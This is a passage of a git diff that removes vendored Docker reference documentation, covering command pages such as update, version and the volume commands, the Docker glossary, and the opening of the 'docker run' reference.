specified, the alias is created for an -existing local version `httpd:latest`. - -## Tagging an image referenced by Name and Tag - -To tag a local image with name "httpd" and tag "test" into the "fedora" -repository with "version1.0.test": - - docker tag httpd:test fedora/httpd:version1.0.test - -## Tagging an image for a private repository - -To push an image to a private registry and not the central Docker -registry you must tag it with the registry hostname and port (if needed). - - docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md deleted file mode 100644 index 0a04828775..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/top.md +++ /dev/null @@ -1,25 +0,0 @@ ---- -title: "top" -description: "The top command description and usage" -keywords: "container, running, processes" ---- - - - -# top - -```markdown -Usage: docker top CONTAINER [ps OPTIONS] - -Display the running processes of a container - -Options: - --help Print usage -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md deleted file mode 100644 index aa2326fefc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -title: "unpause" -description: "The unpause command description and usage" -keywords: "cgroups, suspend, container" ---- - - - -# unpause - -```markdown -Usage: docker unpause CONTAINER [CONTAINER...] - -Unpause all processes within one or more containers - -Options: - --help Print usage -``` - -The `docker unpause` command un-suspends all processes in the specified containers. -On Linux, it does this using the cgroups freezer. - -See the -[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) -for further details. - -## Related information - -* [pause](pause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md deleted file mode 100644 index a13900440f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/update.md +++ /dev/null @@ -1,120 +0,0 @@ ---- -title: "update" -description: "The update command description and usage" -keywords: "resources, update, dynamically" ---- - - - -## update - -```markdown -Usage: docker update [OPTIONS] CONTAINER [CONTAINER...] - -Update configuration of one or more containers - -Options: - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - --help Print usage - --kernel-memory string Kernel memory limit - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --restart string Restart policy to apply when a container exits -``` - -The `docker update` command dynamically updates container configuration. -You can use this command to prevent containers from consuming too many -resources from their Docker host. With a single command, you can place -limits on a single container or on many. To specify more than one container, -provide space-separated list of container names or IDs. - -With the exception of the `--kernel-memory` option, you can specify these -options on a running or a stopped container. On kernel version older than -4.6, you can only update `--kernel-memory` on a stopped container or on -a running container with kernel memory initialized. - -## Examples - -The following sections illustrate ways to use this command. - -### Update a container's cpu-shares - -To limit a container's cpu-shares to 512, first identify the container -name or ID. You can use `docker ps` to find these values. You can also -use the ID returned from the `docker run` command. Then, do the following: - -```bash -$ docker update --cpu-shares 512 abebf7571666 -``` - -### Update a container with cpu-shares and memory - -To update multiple resource configurations for multiple containers: - -```bash -$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse -``` - -### Update a container's kernel memory constraints - -You can update a container's kernel memory limit using the `--kernel-memory` -option. On kernel version older than 4.6, this option can be updated on a -running container only if the container was started with `--kernel-memory`. -If the container was started *without* `--kernel-memory` you need to stop -the container before updating kernel memory. - -For example, if you started a container with this command: - -```bash -$ docker run -dit --name test --kernel-memory 50M ubuntu bash -``` - -You can update kernel memory while the container is running: - -```bash -$ docker update --kernel-memory 80M test -``` - -If you started a container *without* kernel memory initialized: - -```bash -$ docker run -dit --name test2 --memory 300M ubuntu bash -``` - -Update kernel memory of running container `test2` will fail. You need to stop -the container before updating the `--kernel-memory` setting. The next time you -start it, the container uses the new value. - -Kernel version newer than (include) 4.6 does not have this limitation, you -can use `--kernel-memory` the same way as other options. - -### Update a container's restart policy - -You can change a container's restart policy on a running container. The new -restart policy takes effect instantly after you run `docker update` on a -container. - -To update restart policy for one or more containers: - -```bash -$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse -``` - -Note that if the container is started with "--rm" flag, you cannot update the restart -policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the -container. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md deleted file mode 100644 index cb1bcee5b3..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/version.md +++ /dev/null @@ -1,67 +0,0 @@ ---- -title: "version" -description: "The version command description and usage" -keywords: "version, architecture, api" ---- - - - -# version - -```markdown -Usage: docker version [OPTIONS] - -Show the Docker version information - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -By default, this will render all version information in an easy to read -layout. If a format is specified, the given template will be executed instead. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -**Default output:** - - $ docker version - Client: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - - Server: - Version: 1.8.0 - API version: 1.20 - Go version: go1.4.2 - Git commit: f5bae0a - Built: Tue Jun 23 17:56:00 UTC 2015 - OS/Arch: linux/amd64 - -**Get server version:** - - {% raw %} - $ docker version --format '{{.Server.Version}}' - 1.8.0 - {% endraw %} - -**Dump raw data:** - - {% raw %} - $ docker version --format '{{json .}}' - {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}} - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md deleted file mode 100644 index 9b188a9500..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md +++ /dev/null @@ -1,91 +0,0 @@ ---- -title: "volume create" -description: "The volume create command description and usage" -keywords: "volume, create" ---- - - - -# volume create - -```markdown -Usage: docker volume create [OPTIONS] [VOLUME] - -Create a volume - -Options: - -d, --driver string Specify volume driver name (default "local") - --help Print usage - --label value Set metadata for a volume (default []) - -o, --opt value Set driver specific options (default map[]) -``` - -Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. You create a volume and then configure the container to use it, for example: - -```bash -$ docker volume create hello -hello - -$ docker run -d -v hello:/world busybox ls /world -``` - -The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container. - -Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data. - -Volume names must be unique among drivers. This means you cannot use the same volume name with two different drivers. If you attempt this `docker` returns an error: - -``` -A volume named "hello" already exists with the "some-other" driver. Choose a different volume name. -``` - -If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error. - -## Driver specific options - -Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options: - -```bash -$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey -``` - -These options are passed directly to the volume driver. Options for -different volume drivers may do different things (or nothing at all). - -The built-in `local` driver on Windows does not support any options. - -The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html). - -For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000. - -```bash -$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo -``` - -Another example that uses `btrfs`: - -```bash -$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo -``` - -Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`: - -```bash -$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo -``` - - -## Related information - -* [volume inspect](volume_inspect.md) -* [volume ls](volume_ls.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md deleted file mode 100644 index 98e0ee5abf..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md +++ /dev/null @@ -1,59 +0,0 @@ ---- -title: "volume inspect" -description: "The volume inspect command description and usage" -keywords: "volume, inspect" ---- - - - -# volume inspect - -```markdown -Usage: docker volume inspect [OPTIONS] VOLUME [VOLUME...] - -Display detailed information on one or more volumes - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -Returns information about a volume. By default, this command renders all results -in a JSON array. You can specify an alternate format to execute a -given template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. - -Example output: - - $ docker volume create - 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - [ - { - "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d", - "Driver": "local", - "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data", - "Status": null - } - ] - - {% raw %} - $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d - /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data - {% endraw %} - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md deleted file mode 100644 index 90ecef2abe..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md +++ /dev/null @@ -1,183 +0,0 @@ ---- -title: "volume ls" -description: "The volume ls command description and usage" -keywords: "volume, list" ---- - - - -# volume ls - -```markdown -Usage: docker volume ls [OPTIONS] - -List volumes - -Aliases: - ls, list - -Options: - -f, --filter value Provide filter values (e.g. 'dangling=true') (default []) - - dangling= a volume if referenced or not - - driver= a volume's driver name - - label= or label== - - name= a volume's name - --format string Pretty-print volumes using a Go template - --help Print usage - -q, --quiet Only display volume names -``` - -List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - -```bash -$ docker volume create rosemary -rosemary -$docker volume create tyler -tyler -$ docker volume ls -DRIVER VOLUME NAME -local rosemary -local tyler -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* dangling (boolean - true or false, 0 or 1) -* driver (a volume driver's name) -* label (`label=` or `label==`) -* name (a volume's name) - -### dangling - -The `dangling` filter matches on all volumes not referenced by any containers - -```bash -$ docker run -d -v tyler:/tmpwork busybox - -f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18 -$ docker volume ls -f dangling=true -DRIVER VOLUME NAME -local rosemary -``` - -### driver - -The `driver` filter matches on all or part of a volume's driver name. - -The following filter matches all volumes with a driver name containing the `local` string. - -```bash -$ docker volume ls -f driver=local - -DRIVER VOLUME NAME -local rosemary -local tyler -``` - -#### Label - -The `label` filter matches volumes based on the presence of a `label` alone or -a `label` and a value. - -First, let's create some volumes to illustrate this; - -```bash -$ docker volume create the-doctor --label is-timelord=yes -the-doctor -$ docker volume create daleks --label is-timelord=no -daleks -``` - -The following example filter matches volumes with the `is-timelord` label -regardless of its value. - -```bash -$ docker volume ls --filter label=is-timelord - -DRIVER VOLUME NAME -local daleks -local the-doctor -``` - -As can be seen in the above example, both volumes with `is-timelord=yes`, and -`is-timelord=no` are returned. - -Filtering on both `key` *and* `value` of the label, produces the expected result: - -```bash -$ docker volume ls --filter label=is-timelord=yes - -DRIVER VOLUME NAME -local the-doctor -``` - -Specifying multiple label filter produces an "and" search; all conditions -should be met; - -```bash -$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no - -DRIVER VOLUME NAME -``` - -### name - -The `name` filter matches on all or part of a volume's name. - -The following filter matches all volumes with a name containing the `rose` string. - - $ docker volume ls -f name=rose - DRIVER VOLUME NAME - local rosemary - -## Formatting - -The formatting options (`--format`) pretty-prints volumes output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ---------------|------------------------------------------------------------------------------------------ -`.Name` | Network name -`.Driver` | Network driver -`.Scope` | Network scope (local, global) -`.Mountpoint` | Whether the network is internal or not. -`.Labels` | All labels assigned to the volume. -`.Label` | Value of a specific label for this volume. For example `{{.Label "project.version"}}` - -When using the `--format` option, the `volume ls` command will either -output the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. - -The following example uses a template without headers and outputs the -`Name` and `Driver` entries separated by a colon for all volumes: - -```bash -$ docker volume ls --format "{{.Name}}: {{.Driver}}" -vol1: local -vol2: local -vol3: local -``` - -## Related information - -* [volume create](volume_create.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md deleted file mode 100644 index d910a49cdc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md +++ /dev/null @@ -1,54 +0,0 @@ ---- -title: "volume prune" -description: "Remove unused volumes" -keywords: "volume, prune, delete" ---- - - - -# volume prune - -```markdown -Usage: docker volume prune [OPTIONS] - -Remove all unused volumes - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused volumes. Unused volumes are those which are not referenced by any containers - -Example output: - -```bash -$ docker volume prune -WARNING! This will remove all volumes not used by at least one container. -Are you sure you want to continue? [y/N] y -Deleted Volumes: -07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e -my-named-vol - -Total reclaimed space: 36 B -``` - -## Related information - -* [volume create](volume_create.md) -* [volume ls](volume_ls.md) -* [volume inspect](volume_inspect.md) -* [volume rm](volume_rm.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md deleted file mode 100644 index 1bf9dba220..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -title: "volume rm" -description: "the volume rm command description and usage" -keywords: "volume, rm" ---- - - - -# volume rm - -```markdown -Usage: docker volume rm [OPTIONS] VOLUME [VOLUME...] - -Remove one or more volumes - -Aliases: - rm, remove - -Options: - -f, --force Force the removal of one or more volumes - --help Print usage -``` - -Remove one or more volumes. You cannot remove a volume that is in use by a container. - - $ docker volume rm hello - hello - -## Related information - -* [volume create](volume_create.md) -* [volume inspect](volume_inspect.md) -* [volume ls](volume_ls.md) -* [volume prune](volume_prune.md) -* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md deleted file mode 100644 index a07b82b071..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md +++ /dev/null @@ -1,25 +0,0 @@ ---- -title: "wait" -description: "The wait command description and usage" -keywords: "container, stop, wait" ---- - - - -# wait - -```markdown -Usage: docker wait CONTAINER [CONTAINER...] - -Block until one or more containers stop, then print their exit codes - -Options: - --help Print usage -``` diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md deleted file mode 100644 index 0bc39a2023..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/glossary.md +++ /dev/null @@ -1,286 +0,0 @@ ---- -title: "Docker Glossary" -description: "Glossary of terms used around Docker" -keywords: "glossary, docker, terms, definitions" ---- - - - -# Glossary - -A list of terms used around the Docker project. - -## aufs - -aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that -Docker supports as a storage backend. It implements the -[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems. - -## base image - -An image that has no parent is a **base image**. - -## boot2docker - -[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made -specifically to run Docker containers. The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox. - -## btrfs - -btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker -supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) -filesystem. - -## build - -build is the process of building Docker images using a [Dockerfile](#dockerfile). -The build uses a Dockerfile and a "context". The context is the set of files in the -directory in which the image is built. - -## cgroups - -cgroups is a Linux kernel feature that limits, accounts for, and isolates -the resource usage (CPU, memory, disk I/O, network, etc.) of a collection -of processes. Docker relies on cgroups to control and isolate resource limits. - -*Also known as : control groups* - -## Compose - -[Compose](https://github.com/docker/compose) is a tool for defining and -running complex applications with Docker. With compose, you define a -multi-container application in a single file, then spin your -application up in a single command which does everything that needs to -be done to get it running. - -*Also known as : docker-compose, fig* - -## container - -A container is a runtime instance of a [docker image](#image). - -A Docker container consists of - -- A Docker image -- Execution environment -- A standard set of instructions - -The concept is borrowed from Shipping Containers, which define a standard to ship -goods globally. Docker defines a standard to ship software. - -## data volume - -A data volume is a specially-designated directory within one or more containers -that bypasses the Union File System. Data volumes are designed to persist data, -independent of the container's life cycle. Docker therefore never automatically -delete volumes when you remove a container, nor will it "garbage collect" -volumes that are no longer referenced by a container. - - -## Docker - -The term Docker can refer to - -- The Docker project as a whole, which is a platform for developers and sysadmins to -develop, ship, and run applications -- The docker daemon process running on the host which manages images and containers - - -## Docker Hub - -The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with -Docker and its components. It provides the following services: - -- Docker image hosting -- User authentication -- Automated image builds and work-flow tools such as build triggers and web hooks -- Integration with GitHub and Bitbucket - - -## Dockerfile - -A Dockerfile is a text document that contains all the commands you would -normally execute manually in order to build a Docker image. Docker can -build images automatically by reading the instructions from a Dockerfile. - -## filesystem - -A file system is the method an operating system uses to name files -and assign them locations for efficient storage and retrieval. - -Examples : - -- Linux : ext4, aufs, btrfs, zfs -- Windows : NTFS -- macOS : HFS+ - -## image - -Docker images are the basis of [containers](#container). An Image is an -ordered collection of root filesystem changes and the corresponding -execution parameters for use within a container runtime. An image typically -contains a union of layered filesystems stacked on top of each other. An image -does not have state and it never changes. - -## libcontainer - -libcontainer provides a native Go implementation for creating containers with -namespaces, cgroups, capabilities, and filesystem access controls. It allows -you to manage the lifecycle of the container performing additional operations -after the container is created. - -## libnetwork - -libnetwork provides a native Go implementation for creating and managing container -network namespaces and other network resources. It manage the networking lifecycle -of the container performing additional operations after the container is created. - -## link - -links provide a legacy interface to connect Docker containers running on the -same host to each other without exposing the hosts' network ports. Use the -Docker networks feature instead. - -## Machine - -[Machine](https://github.com/docker/machine) is a Docker tool which -makes it really easy to create Docker hosts on your computer, on -cloud providers and inside your own data center. It creates servers, -installs Docker on them, then configures the Docker client to talk to them. - -*Also known as : docker-machine* - -## node - -A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual -machine running an instance of the Docker Engine in swarm mode. - -**Manager nodes** perform swarm management and orchestration duties. By default -manager nodes are also worker nodes. - -**Worker nodes** execute tasks. - -## overlay network driver - -Overlay network driver provides out of the box multi-host network connectivity -for docker containers in a cluster. - -## overlay storage driver - -OverlayFS is a [filesystem](#filesystem) service for Linux which implements a -[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems. -It is supported by the Docker daemon as a storage driver. - -## registry - -A Registry is a hosted service containing [repositories](#repository) of [images](#image) -which responds to the Registry API. - -The default registry can be accessed using a browser at [Docker Hub](#docker-hub) -or using the `docker search` command. - -## repository - -A repository is a set of Docker images. A repository can be shared by pushing it -to a [registry](#registry) server. The different images in the repository can be -labeled using [tags](#tag). - -Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/) -and its [tags](https://hub.docker.com/r/library/nginx/tags/) - - -## service - -A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how -you want to run your application containers in a swarm. At the most basic level -a service defines which container image to run in the swarm and which commands -to run in the container. For orchestration purposes, the service defines the -"desired state", meaning how many containers to run as tasks and constraints for -deploying the containers. - -Frequently a service is a microservice within the context of some larger -application. Examples of services might include an HTTP server, a database, or -any other type of executable program that you wish to run in a distributed -environment. - -## service discovery - -Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component -internal to the swarm that automatically assigns each service on an overlay -network in the swarm a VIP and DNS entry. Containers on the network share DNS -mappings for the service via gossip so any container on the network can access -the service via its service name. - -You don’t need to expose service-specific ports to make the service available to -other services on the same overlay network. The swarm’s internal load balancer -automatically distributes requests to the service VIP among the active tasks. - -## swarm - -A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode). - -## Docker Swarm - -Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine. - -Docker Swarm is the name of a standalone native clustering tool for Docker. -Docker Swarm pools together several Docker hosts and exposes them as a single -virtual Docker host. It serves the standard Docker API, so any tool that already -works with Docker can now transparently scale up to multiple hosts. - -*Also known as : docker-swarm* - -## swarm mode - -[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration -features embedded in Docker Engine. When you initialize a new swarm (cluster) or -join nodes to a swarm, the Docker Engine runs in swarm mode. - -## tag - -A tag is a label applied to a Docker image in a [repository](#repository). -tags are how various images in a repository are distinguished from each other. - -*Note : This label is not related to the key=value labels set for docker daemon* - -## task - -A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the -atomic unit of scheduling within a swarm. A task carries a Docker container and -the commands to run inside the container. Manager nodes assign tasks to worker -nodes according to the number of replicas set in the service scale. - -The diagram below illustrates the relationship of services to tasks and -containers. - -![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png) - -## Toolbox - -Docker Toolbox is the installer for Mac and Windows users. - - -## Union file system - -Union file systems, or UnionFS, are file systems that operate by creating layers, making them -very lightweight and fast. Docker uses union file systems to provide the building -blocks for containers. - - -## virtual machine - -A virtual machine is a program that emulates a complete computer and imitates dedicated hardware. -It shares physical hardware resources with other users but isolates the operating system. The -end user has the same experience on a Virtual Machine as they would have on dedicated hardware. - -Compared to containers, a virtual machine is heavier to run, provides more isolation, -gets its own set of resources and does minimal sharing. - -*Also known as : VM* diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md deleted file mode 100644 index f24c342dfc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/index.md +++ /dev/null @@ -1,21 +0,0 @@ ---- -title: "Engine reference" -description: "Docker Engine reference" -keywords: "Engine" ---- - - - -# Engine reference - -* [Dockerfile reference](builder.md) -* [Docker run reference](run.md) -* [Command line reference](commandline/index.md) -* [API Reference](https://docs.docker.com/engine/api/) diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md deleted file mode 100644 index 73769ed610..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/run.md +++ /dev/null @@ -1,1555 +0,0 @@ ---- -title: "Docker run reference" -description: "Configure containers at runtime" -keywords: "docker, run, configure, runtime" ---- - - - -# Docker run reference - -Docker runs processes in isolated containers. A container is a process -which runs on a host. The host may be local or remote. When an operator -executes `docker run`, the container process that runs is isolated in -that it has its own file system, its own networking, and its own -isolated process tree separate from the host. - -This page details how to use the `docker run` command to define the -container's resources at runtime. - -## General form - -The basic `docker run` command takes this form: - - $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] - -The `docker run` command must specify an [*IMAGE*](glossary.md#image) -to derive the container from. An image developer can define image -defaults related to: - - * detached or foreground running - * container identification - * network settings - * runtime constraints on CPU and memory - -With the `docker run [OPTIONS]` an operator can add to or override the -image defaults set by a developer. And, additionally, operators can -override nearly all the defaults set by the Docker runtime itself. The -operator's ability to override image and Docker runtime defaults is why -[*run*](commandline/run.md) has more options than any -other `docker` command. - -To learn how to interpret the types of `[OPTIONS]`, see [*Option -types*](commandline/cli.md#option-types). - -> **Note**: Depending on your Docker system configuration, you may be -> required to preface the `docker run` command with `sudo`. To avoid -> having to use `sudo` with the `docker` command, your system -> administrator can create a Unix group called `docker` and add users to -> it. For more information about this configuration, refer to the Docker -> installation documentation for your operating system. - - -## Operator exclusive options - -Only the operator (the person executing `docker run`) can set the -following options. - - - [Detached vs foreground](#detached-vs-foreground) - - [Detached (-d)](#detached--d) - - [Foreground](#foreground) - - [Container identification](#container-identification) - - [Name (--name)](#name---name) - - [PID equivalent](#pid-equivalent) - - [IPC settings (--ipc)](#ipc-settings---ipc) - - [Network settings](#network-settings) - - [Restart policies (--restart)](#restart-policies---restart) - - [Clean up (--rm)](#clean-up---rm) - - [Runtime constraints on resources](#runtime-constraints-on-resources) - - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities) - -## Detached vs foreground - -When starting a Docker container, you must first decide if you want to -run the container in the background in a "detached" mode or in the -default foreground mode: - - -d=false: Detached mode: Run container in the background, print new container id - -### Detached (-d) - -To start a container in detached mode, you use `-d=true` or just `-d` option. By -design, containers started in detached mode exit when the root process used to -run the container exits. A container in detached mode cannot be automatically -removed when it stops, this means you cannot use the `--rm` option with `-d` option. - -Do not pass a `service x start` command to a detached container. For example, this -command attempts to start the `nginx` service. - - $ docker run -d -p 80:80 my_image service nginx start - -This succeeds in starting the `nginx` service inside the container. However, it -fails the detached container paradigm in that, the root process (`service nginx -start`) returns and the detached container stops as designed. As a result, the -`nginx` service is started but could not be used. Instead, to start a process -such as the `nginx` web server do the following: - - $ docker run -d -p 80:80 my_image nginx -g 'daemon off;' - -To do input/output with a detached container use network connections or shared -volumes. These are required because the container is no longer listening to the -command line where `docker run` was run. - -To reattach to a detached container, use `docker` -[*attach*](commandline/attach.md) command. - -### Foreground - -In foreground mode (the default when `-d` is not specified), `docker -run` can start the process in the container and attach the console to -the process's standard input, output, and standard error. It can even -pretend to be a TTY (this is what most command line executables expect) -and pass along signals. All of that is configurable: - - -a=[] : Attach to `STDIN`, `STDOUT` and/or `STDERR` - -t : Allocate a pseudo-tty - --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only) - -i : Keep STDIN open even if not attached - -If you do not specify `-a` then Docker will [attach to both stdout and stderr -]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267). -You can specify to which of the three standard streams (`STDIN`, `STDOUT`, -`STDERR`) you'd like to connect instead, as in: - - $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash - -For interactive processes (like a shell), you must use `-i -t` together in -order to allocate a tty for the container process. `-i -t` is often written `-it` -as you'll see in later examples. Specifying `-t` is forbidden when the client -standard output is redirected or piped, such as in: - - $ echo test | docker run -i busybox cat - ->**Note**: A process running as PID 1 inside a container is treated ->specially by Linux: it ignores any signal with the default action. ->So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is ->coded to do so. - -## Container identification - -### Name (--name) - -The operator can identify a container in three ways: - -| Identifier type | Example value | -| --------------------- | ------------------------------------------------------------------ | -| UUID long identifier | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" | -| UUID short identifier | "f78375b1c487" | -| Name | "evil_ptolemy" | - -The UUID identifiers come from the Docker daemon. If you do not assign a -container name with the `--name` option, then the daemon generates a random -string name for you. Defining a `name` can be a handy way to add meaning to a -container. If you specify a `name`, you can use it when referencing the -container within a Docker network. This works for both background and foreground -Docker containers. - -> **Note**: Containers on the default bridge network must be linked to -> communicate by name. - -### PID equivalent - -Finally, to help with automation, you can have Docker write the -container ID out to a file of your choosing. This is similar to how some -programs might write out their process ID to a file (you've seen them as -PID files): - - --cidfile="": Write the container ID to the file - -### Image[:tag] - -While not strictly a means of identifying a container, you can specify a version of an -image you'd like to run the container with by adding `image[:tag]` to the command. For -example, `docker run ubuntu:14.04`. - -### Image[@digest] - -Images using the v2 or later image format have a content-addressable identifier -called a digest. As long as the input used to generate the image is 